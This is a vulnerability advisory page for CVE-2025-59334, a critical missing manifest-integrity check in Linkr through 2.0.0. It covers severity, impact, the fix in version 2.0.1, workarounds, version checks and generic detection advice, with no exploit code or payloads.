CVE-2025-59334 – Linkr versions through 2.0.0 fail to verify the... (How to Fix)

Q: What is the severity of CVE-2025-59334?

CVE-2025-59334 has a CVSS score of 9.6 (CRITICAL). Linkr versions through 2.0.0 fail to verify the integrity of .linkr manifest files, allowing attackers to inject malicious file entries into package distributions. When users extract files using a tampered manifest, the client downloads attacker-supplied files without verification, potentially leading to remote code execution. All users of Linkr versions ≤2.0.0 are affected.

📋 TL;DR

Linkr versions through 2.0.0 fail to verify the integrity of .linkr manifest files, allowing attackers to inject malicious file entries into package distributions. When users extract files using a tampered manifest, the client downloads attacker-supplied files without verification, potentially leading to remote code execution. All users of Linkr versions ≤2.0.0 are affected.

💻 Affected Systems

Products:

Linkr

Versions: through 2.0.0

Operating Systems: all

Default Config Vulnerable: ⚠️ Yes

Notes: All installations using .linkr manifest files are vulnerable by default

📦 What is this software?

Linkr by Mohammadzain2008

View all CVEs affecting Linkr →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Remote code execution via malicious binary/script execution leading to full system compromise

🟠

Likely Case

Arbitrary file injection and potential malware installation

🟢

If Mitigated

Failed downloads or warnings when integrity checks fail

🌐 Internet-Facing: HIGH - Attackers can host malicious manifests on public servers

🏢 Internal Only: MEDIUM - Requires internal attacker or compromised internal server

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires modifying manifest files and hosting malicious content

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.0.1

Vendor Advisory: https://github.com/mohammadzain2008/Linkr/security/advisories/GHSA-6wph-mpv2-29xv

Restart Required: No

Instructions:

1. Update Linkr to version 2.0.1 or later using package manager or manual installation. 2. Verify the update with 'linkr --version'. 3. Regenerate any existing .linkr manifests to include integrity checks.

🔧 Temporary Workarounds

Use only trusted manifests

all

Only download and use .linkr manifest files from trusted sources

Manual manifest verification

all

Manually verify manifest integrity before extraction

# Compare manifest checksums manually
# Use checksum tools like sha256sum

🧯 If You Can't Patch

Host manifests only on trusted, secure servers with access controls
Implement network monitoring for unexpected file downloads from untrusted sources

🔍 How to Verify

Check if Vulnerable:

Check Linkr version with 'linkr --version' - if version ≤2.0.0, system is vulnerable

Check Version:

linkr --version

Verify Fix Applied:

After updating, verify version is ≥2.0.1 and test manifest extraction with integrity checking

📡 Detection & Monitoring

Log Indicators:

Failed integrity checks in Linkr logs
Unexpected file downloads from untrusted URLs

Network Indicators:

Downloads from suspicious/unexpected URLs during Linkr extraction

SIEM Query:

process.name:'linkr' AND network.destination.ip:(suspicious_ip_list)

📊 Metadata

CVE ID: CVE-2025-59334

CVSS v3 Score: 9.6 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CWE: CWE-347

EPSS Score: 0.09% exploit probability (25.7th percentile)

Published: September 16, 2025

Last Updated: October 8, 2025

🔗 References

https://github.com/mohammadzain2008/Linkr/commit/182e5ddaa51972e144005b500c4bcebf2fd1a6c0 Patch
https://github.com/mohammadzain2008/Linkr/security/advisories/GHSA-6wph-mpv2-29xv Exploit,Vendor Advisory
https://github.com/mohammadzain2008/Linkr/security/advisories/GHSA-6wph-mpv2-29xv Exploit,Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-59334, you might also want to check these: